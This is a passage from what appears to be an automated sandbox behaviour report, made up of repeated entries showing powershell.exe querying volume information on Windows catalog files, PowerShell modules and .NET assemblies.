                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
